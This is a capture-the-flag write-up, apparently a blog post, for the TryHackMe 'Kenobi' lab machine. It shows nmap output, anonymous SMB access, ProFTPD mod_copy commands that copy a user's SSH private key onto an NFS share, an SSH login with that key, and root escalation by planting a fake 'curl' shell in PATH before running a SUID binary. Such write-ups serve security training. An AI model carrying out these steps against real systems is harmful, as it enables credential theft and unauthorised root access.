THM - Kenobi

Kenobi

skibum 8/29/2020

Recon

NMAP scans

  1. Scan for open ports and understand what is avaible.

    nmap -A -oN nmap/FullScan <Machine_IP> 
    Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-29 06:56 CDT
    Nmap scan report for <Machine_IP> 
    Host is up (0.20s latency).
    Not shown: 990 closed ports
    PORT     STATE    SERVICE       VERSION
    21/tcp   open     ftp           ProFTPD 1.3.5
    22/tcp   open     ssh           OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
    | ssh-hostkey: 
    |   2048 b3:ad:83:41:49:e9:5d:16:8d:3b:0f:05:7b:e2:c0:ae (RSA)
    |   256 f8:27:7d:64:29:97:e6:f8:65:54:65:22:f7:c8:1d:8a (ECDSA)
    |_  256 5a:06:ed:eb:b6:56:7e:4c:01:dd:ea:bc:ba:fa:33:79 (ED25519)
    80/tcp   open     http          Apache httpd 2.4.18 ((Ubuntu))
    | http-robots.txt: 1 disallowed entry 
    |_/admin.html
    |_http-server-header: Apache/2.4.18 (Ubuntu)
    |_http-title: Site doesn't have a title (text/html).
    111/tcp  open     rpcbind       2-4 (RPC #100000)
    | rpcinfo: 
    |   program version    port/proto  service
    |   100000  2,3,4        111/tcp   rpcbind
    |   100000  2,3,4        111/udp   rpcbind
    |   100000  3,4          111/tcp6  rpcbind
    |   100000  3,4          111/udp6  rpcbind
    |   100003  2,3,4       2049/tcp   nfs
    |   100003  2,3,4       2049/tcp6  nfs
    |   100003  2,3,4       2049/udp   nfs
    |   100003  2,3,4       2049/udp6  nfs
    |   100005  1,2,3      36173/udp   mountd
    |   100005  1,2,3      38913/tcp6  mountd
    |   100005  1,2,3      43825/udp6  mountd
    |   100005  1,2,3      44273/tcp   mountd
    |   100021  1,3,4      37709/tcp   nlockmgr
    |   100021  1,3,4      44971/tcp6  nlockmgr
    |   100021  1,3,4      46911/udp   nlockmgr
    |   100021  1,3,4      49498/udp6  nlockmgr
    |   100227  2,3         2049/tcp   nfs_acl
    |   100227  2,3         2049/tcp6  nfs_acl
    |   100227  2,3         2049/udp   nfs_acl
    |_  100227  2,3         2049/udp6  nfs_acl
    139/tcp  open     netbios-ssn   Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
    445/tcp  open     netbios-ssn   Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
    1666/tcp filtered netview-aix-6
    1801/tcp filtered msmq
    2049/tcp filtered nfs
    3703/tcp filtered adobeserver-3
    Service Info: Host: KENOBI; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
    
    Host script results:
    |_clock-skew: mean: 1h40m00s, deviation: 2h53m12s, median: 0s
    |_nbstat: NetBIOS name: KENOBI, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
    | smb-os-discovery: 
    |   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
    |   Computer name: kenobi
    |   NetBIOS computer name: KENOBI\x00
    |   Domain name: \x00
    |   FQDN: kenobi
    |_  System time: 2020-08-29T06:56:47-05:00
    | smb-security-mode: 
    |   account_used: guest
    |   authentication_level: user
    |   challenge_response: supported
    |_  message_signing: disabled (dangerous, but default)
    | smb2-security-mode: 
    |   2.02: 
    |_    Message signing enabled but not required
    | smb2-time: 
    |   date: 2020-08-29T11:56:47
    |_  start_date: N/A
    
    Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 40.34 seconds
    
  2. Knowing that SMB and RPC are avaibe lets script scan SMB first.

    nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse <Machine_IP> -oN nmap/smb445   
    Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-29 07:44 CDT
    Nmap scan report for<Machine_IP> 
    Host is up (0.21s latency).
    
    PORT    STATE SERVICE
    445/tcp open  microsoft-ds
    
    Host script results:
    | smb-enum-shares: 
    |   account_used: guest
    |   \\1<Machine_IP>\IPC$: 
    |     Type: STYPE_IPC_HIDDEN
    |     Comment: IPC Service (kenobi server (Samba, Ubuntu))
    |     Users: 1
    |     Max Users: <unlimited>
    |     Path: C:\tmp
    |     Anonymous access: READ/WRITE
    |     Current user access: READ/WRITE
    |   \\<Machine_IP>\anonymous: 
    |     Type: STYPE_DISKTREE
    |     Comment: 
    |     Users: 0
    |     Max Users: <unlimited>
    |     Path: C:\home\kenobi\share
    |     Anonymous access: READ/WRITE
    |     Current user access: READ/WRITE
    |   \\1<Machine_IP>\print$: 
    |     Type: STYPE_DISKTREE
    |     Comment: Printer Drivers
    |     Users: 0
    |     Max Users: <unlimited>
    |     Path: C:\var\lib\samba\printers
    |     Anonymous access: <none>
    |_    Current user access: <none>
    |_smb-enum-users: ERROR: Script execution failed (use -d to debug)
    
    Nmap done: 1 IP address (1 host up) scanned in 43.14 seconds
    
  3. Now lets script scan RPC.

    nmap -p 111 --script=nfs-ls,nfs-statfs,nfs-showmount <Machine_IP> -oN nmap/rpc111
    Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-29 07:47 CDT
    Nmap scan report for 10.10.1.115
    Host is up (0.30s latency).
    
    PORT    STATE SERVICE
    111/tcp open  rpcbind
    | nfs-showmount: 
    |_  /var *
    
    Nmap done: 1 IP address (1 host up) scanned in 2.33 seconds
    

SMB client

  • Smb client

    smbclient //<Machine_IP>/Anonymous 
    Enter WORKGROUP\skibum's password: 
    Try "help" to get a list of possible commands.
    smb: \> ls
      .                                   D        0  Wed Sep  4 05:49:09 2019
      ..                                  D        0  Wed Sep  4 05:56:07 2019
      log.txt                             N    12237  Wed Sep  4 05:49:09 2019
    
            9204224 blocks of size 1024. 6877100 blocks available
    smb: \> get log.txt
    getting file \log.txt of size 12237 as log.txt (12.2 KiloBytes/sec) (average 12.2 KiloBytes/sec)
    smb: \> exit
    

cat log.txt


## FTP

1. Try and connect on the FTP

netcat 21

220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) []

SITE CPFR /home/kenobi/.ssh/idrsa
350 File or directory exists, ready for destination name
SITE CPTO /var/tmp/id
rsa
250 Copy successful


2. Exploit proFTPD 1.3.5

mkdir /mnt/kenobiNFS
mount :/var /mnt/kenobiNFS
ls -la /mnt/kenobiNFS


3. ssh into the machnine

ssh -i idrsa kenobi@<MachineIP>


## priv esc

1. Find SUID files
``` bash
find / -perm /4000 -type f 2>/dev/null

Look for somthing that stands out.

  • /sbin/mount.nfs
  • /usr/lib/policykit-1/polkit-agent-helper-1
  • /usr/lib/dbus-1.0/dbus-daemon-launch-helper
  • /usr/lib/snapd/snap-confine
  • /usr/lib/eject/dmcrypt-get-device
  • /usr/lib/openssh/ssh-keysign
  • /usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
  • /usr/bin/chfn
  • /usr/bin/newgidmap
  • /usr/bin/pkexec
  • /usr/bin/passwd
  • /usr/bin/newuidmap
  • /usr/bin/gpasswd
  • /usr/bin/menu
  • /usr/bin/sudo
  • /usr/bin/chsh
  • /usr/bin/at
  • /usr/bin/newgrp
  • /bin/umount
  • /bin/fusermount
  • /bin/mount
  • /bin/ping
  • /bin/su
  • /bin/ping6
  1. run and check out the binary that stands out.

    1. status check
    2. kernel version
    3. ifconfig
    ** Enter your choice :1
    HTTP/1.1 200 OK
    Date: Sat, 29 Aug 2020 17:51:48 GMT
    Server: Apache/2.4.18 (Ubuntu)
    Last-Modified: Wed, 04 Sep 2019 09:07:20 GMT
    ETag: "c8-591b6884b6ed2"
    Accept-Ranges: bytes
    Content-Length: 200
    Vary: Accept-Encoding
    Content-Type: text/html
    

    Note that status check runs a curl command, can we overrite the path and machine?

  2. Try and overwrite the machine curl command.

    echo /bin/sh > curl
    chmod 777 curl
    export PATH=/tmp:$PATH
    /usr/bin/menu
    

  1. status check
  2. kernel version
  3. ifconfig ** Enter your choice :1 # id uid=0(root) gid=1000(kenobi) groups=1000(kenobi),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),113(lpadmin),114(sambashare) # whoami root # ```

P0wn3d!!!!


You'll only receive email when they publish something new.

More from sk18um
All posts